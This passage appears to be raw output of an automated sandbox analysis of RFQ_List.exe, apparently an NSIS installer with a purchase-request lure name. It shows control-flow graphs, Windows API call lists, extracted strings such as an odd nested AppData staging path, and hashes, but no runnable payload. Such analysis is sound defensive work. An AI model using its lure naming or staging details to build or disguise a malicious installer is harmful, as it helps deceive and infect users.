4050ab-4050bf InvalidateRect 221->236 237 40500f 221->237 245 404fc1-404fc7 222->245 246 404fcf-404fde SendMessageW 222->246 226->203 227->203 236->177 241 4050c1-4050d0 call 404a51 call 404a39 236->241 239 405012-40501d 237->239 242 405093-4050a5 239->242 243 40501f-40502e 239->243 241->177 242->236 242->239 248 405030-40503d 243->248 249 405041-405044 243->249 250 404fc9 245->250 251 404fca-404fcd 245->251 246->221 248->249 252 405046-405049 249->252 253 40504b-405054 249->253 250->251 251->245 251->246 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->242 256->255
                  APIs
                  • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                  • GetDlgItem.USER32(?,00000408), ref: 00404B53
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                  • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                  • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                  • DeleteObject.GDI32(00000000), ref: 00404C26
                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                  • ShowWindow.USER32(?,00000005), ref: 00404D80
                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                  • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                  • GlobalFree.KERNEL32(?), ref: 00404F60
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                  • ShowWindow.USER32(?,00000000), ref: 004050FF
                  • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                  • ShowWindow.USER32(00000000), ref: 00405111
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                  • String ID: $M$N
                  • API String ID: 1638840714-813528018
                  • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                  • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                  • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                  • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 500 406077-406082 501 406084-406093 500->501 502 406095-4060ab 500->502 501->502 503 4060b1-4060be 502->503 504 4062c3-4062c9 502->504 503->504 505 4060c4-4060cb 503->505 506 4060d0-4060dd 504->506 507 4062cf-4062da 504->507 505->504 506->507 508 4060e3-4060ef 506->508 509 4062e5-4062e6 507->509 510 4062dc-4062e0 call 406055 507->510 511 4062b0 508->511 512 4060f5-406131 508->512 510->509 514 4062b2-4062bc 511->514 515 4062be-4062c1 511->515 516 406251-406255 512->516 517 406137-406142 GetVersion 512->517 514->504 515->504 520 406257-40625b 516->520 521 40628a-40628e 516->521 518 406144-406148 517->518 519 40615c 517->519 518->519 524 40614a-40614e 518->524 527 406163-40616a 519->527 525 40626b-406278 call 406055 520->525 526 40625d-406269 call 405f9c 520->526 522 406290-406298 call 406077 521->522 523 40629d-4062ae lstrlenW 521->523 522->523 523->504 524->519 530 406150-406154 524->530 534 40627d-406286 525->534 526->534 532 40616c-40616e 527->532 533 40616f-406171 527->533 530->519 537 406156-40615a 530->537 532->533 535 406173-406190 call 405f22 533->535 536 4061ad-4061b0 533->536 534->523 539 406288 534->539 544 406195-406199 535->544 541 4061c0-4061c3 536->541 542 4061b2-4061be GetSystemDirectoryW 536->542 537->527 543 406249-40624f call 4062e9 539->543 546 4061c5-4061d3 GetWindowsDirectoryW 541->546 547 40622e-406230 541->547 545 406232-406236 542->545 543->523 548 406238-40623c 544->548 549 40619f-4061a8 call 406077 544->549 545->543 545->548 546->547 547->545 550 4061d5-4061df 547->550 548->543 553 40623e-406244 lstrcatW 548->553 549->545 555 4061e1-4061e4 550->555 556 4061f9-40620f SHGetSpecialFolderLocation 550->556 553->543 555->556 560 4061e6-4061ed 555->560 557 406211-406228 SHGetPathFromIDListW CoTaskMemFree 556->557 558 40622a 556->558 557->545 557->558 558->547 561 4061f5-4061f7 560->561 561->545 561->556
                  APIs
                  • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D8A2), ref: 0040613A
                  • GetSystemDirectoryW.KERNEL32(Space required: ,00000400), ref: 004061B8
                  • GetWindowsDirectoryW.KERNEL32(Space required: ,00000400), ref: 004061CB
                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                  • SHGetPathFromIDListW.SHELL32(?,Space required: ), ref: 00406215
                  • CoTaskMemFree.OLE32(?), ref: 00406220
                  • lstrcatW.KERNEL32(Space required: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                  • lstrlenW.KERNEL32(Space required: ,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D8A2), ref: 0040629E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                  • String ID: Software\Microsoft\Windows\CurrentVersion$Space required: $\Microsoft\Internet Explorer\Quick Launch
                  • API String ID: 900638850-1002770640
                  • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                  • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                  • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                  • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 562 405846-40586c call 405b11 565 405885-40588c 562->565 566 40586e-405880 DeleteFileW 562->566 568 40588e-405890 565->568 569 40589f-4058af call 406055 565->569 567 405a02-405a06 566->567 570 4059b0-4059b5 568->570 571 405896-405899 568->571 575 4058b1-4058bc lstrcatW 569->575 576 4058be-4058bf call 405a55 569->576 570->567 574 4059b7-4059ba 570->574 571->569 571->570 577 4059c4-4059cc call 406398 574->577 578 4059bc-4059c2 574->578 579 4058c4-4058c8 575->579 576->579 577->567 585 4059ce-4059e2 call 405a09 call 4057fe 577->585 578->567 583 4058d4-4058da lstrcatW 579->583 584 4058ca-4058d2 579->584 586 4058df-4058fb lstrlenW FindFirstFileW 583->586 584->583 584->586 602 4059e4-4059e7 585->602 603 4059fa-4059fd call 4051b4 585->603 587 405901-405909 586->587 588 4059a5-4059a9 586->588 590 405929-40593d call 406055 587->590 591 40590b-405913 587->591 588->570 593 4059ab 588->593 604 405954-40595f call 4057fe 590->604 605 40593f-405947 590->605 594 405915-40591d 591->594 595 405988-405998 FindNextFileW 591->595 593->570 594->590 598 40591f-405927 594->598 595->587 601 40599e-40599f FindClose 595->601 598->590 598->595 601->588 602->578 606 4059e9-4059f8 call 4051b4 call 405ef6 602->606 603->567 615 405980-405983 call 4051b4 604->615 616 405961-405964 604->616 605->595 607 405949-405952 call 405846 605->607 606->567 607->595 615->595 619 405966-405976 call 4051b4 call 405ef6 616->619 620 405978-40597e 616->620 619->595 620->595
                  APIs
                  • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 0040586F
                  • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 004058B7
                  • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 004058DA
                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 004058E0
                  • FindFirstFileW.KERNELBASE(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 004058F0
                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                  • FindClose.KERNEL32(00000000), ref: 0040599F
                  Strings
                  • \*.*, xrefs: 004058B1
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                  • "C:\Users\user\Desktop\RFQ_List.exe", xrefs: 0040584F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                  • String ID: "C:\Users\user\Desktop\RFQ_List.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                  • API String ID: 2035342205-2818191645
                  • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                  • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                  • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                  • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                  APIs
                  • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                  Strings
                  • C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes, xrefs: 00402154
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CreateInstance
                  • String ID: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes
                  • API String ID: 542301482-2072545860
                  • Opcode ID: c9022358312334301b7f12b82a851e8225c8b7b61dd5b1f0802db8af2cd3e825
                  • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                  • Opcode Fuzzy Hash: c9022358312334301b7f12b82a851e8225c8b7b61dd5b1f0802db8af2cd3e825
                  • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                  APIs
                  • FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                  • FindClose.KERNEL32(00000000), ref: 004063AF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID:
                  • API String ID: 2295610775-0
                  • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                  • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                  • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                  • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 263 403c70-403c7d SetWindowPos 260->263 264 403c83-403c86 260->264 266 403e47-403e4c call 404165 261->266 267 403e09-403e0c 261->267 262->261 263->264 269 403ca0-403ca6 264->269 270 403c88-403c9a ShowWindow 264->270 275 403e51-403e6c 266->275 272 403e0e-403e19 call 401389 267->272 273 403e3f-403e41 267->273 276 403cc2-403cc5 269->276 277 403ca8-403cbd DestroyWindow 269->277 270->269 272->273 288 403e1b-403e3a SendMessageW 272->288 273->266 274 4040e6 273->274 283 4040e8-4040ef 274->283 281 403e75-403e7b 275->281 282 403e6e-403e70 call 40140b 275->282 286 403cc7-403cd3 SetWindowLongW 276->286 287 403cd8-403cde 276->287 284 4040c3-4040c9 277->284 291 403e81-403e8c 281->291 292 4040a4-4040bd DestroyWindow EndDialog 281->292 282->281 284->274 289 4040cb-4040d1 284->289 286->283 293 403d81-403d8f call 404180 287->293 294 403ce4-403cf5 GetDlgItem 287->294 288->283 289->274 296 4040d3-4040dc ShowWindow 289->296 291->292 297 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 291->297 292->284 293->283 298 403d14-403d17 294->298 299 403cf7-403d0e SendMessageW IsWindowEnabled 294->299 296->274 327 403ee1-403ee6 297->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 297->328 300 403d19-403d1a 298->300 301 403d1c-403d1f 298->301 299->274 299->298 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->293 308 403d68-403d7b SendMessageW 305->308 309 403d29-403d2b 305->309 306->308 310 403d34-403d3a 306->310 308->293 309->304 313 403d51-403d5a call 40140b 310->313 314 403d3c-403d42 call 40140b 310->314 313->293 323 403d5c-403d66 313->323 325 403d48 314->325 323->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->275 345 403fb9-403fbb 336->345 345->275 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->284 350 403ffe-40402b CreateDialogParamW 347->350 348->274 349 403fd3-403fd9 348->349 349->275 351 403fdf 349->351 350->284 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->274 352->274 357 40408a-40409d ShowWindow call 404165 352->357 359 4040a2 357->359 359->284
                  APIs
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                  • ShowWindow.USER32(?), ref: 00403C9A
                  • DestroyWindow.USER32 ref: 00403CAE
                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                  • GetDlgItem.USER32(?,?), ref: 00403CEB
                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                  • IsWindowEnabled.USER32(00000000), ref: 00403D06
                  • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                  • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                  • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                  • ShowWindow.USER32(00000000,?), ref: 00403EF0
                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                  • EnableWindow.USER32(?,?), ref: 00403F1D
                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                  • EnableMenuItem.USER32(00000000), ref: 00403F3A
                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                  • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                  • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                  • ShowWindow.USER32(?,0000000A), ref: 004040D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                  • String ID:
                  • API String ID: 3282139019-0
                  • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                  • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                  • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                  • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 379 40395e-403986 call 405f22 377->379 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 379->378 386 403988-40398c 379->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 400 403aa5-403aa8 388->400 401 403aad-403ab8 call 403b74 388->401 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 404 4039bc-4039c6 GetFileAttributesW 398->404 400->396 412 403b41-403b49 call 405287 401->412 413 403abe-403ad8 ShowWindow call 4063bf 401->413 407 4039c8-4039ca 404->407 408 4039cc-4039cd call 405a55 404->408 407->397 407->408 408->397 418 403b63-403b65 call 40140b 412->418 419 403b4b-403b51 412->419 420 403ae4-403af6 GetClassInfoW 413->420 421 403ada-403adf call 4063bf 413->421 418->393 419->400 422 403b57-403b5e call 40140b 419->422 425 403af8-403b08 GetClassInfoW RegisterClassW 420->425 426 403b0e-403b31 DialogBoxParamW call 40140b 420->426 421->420 422->400 425->426 430 403b36-403b3f call 4037ee 426->430 430->396
                  APIs
                    • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                    • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                  • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 004038B8
                    • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                  • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 0040391F
                  • lstrlenW.KERNEL32(Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74DF3420), ref: 0040399F
                  • lstrcmpiW.KERNEL32(?,.exe,Space required: ,?,?,?,Space required: ,00000000,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                  • GetFileAttributesW.KERNEL32(Space required: ), ref: 004039BD
                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes), ref: 00403A06
                  • RegisterClassW.USER32(00433EA0), ref: 00403A43
                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                  • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                  • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                  • RegisterClassW.USER32(00433EA0), ref: 00403B08
                  • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
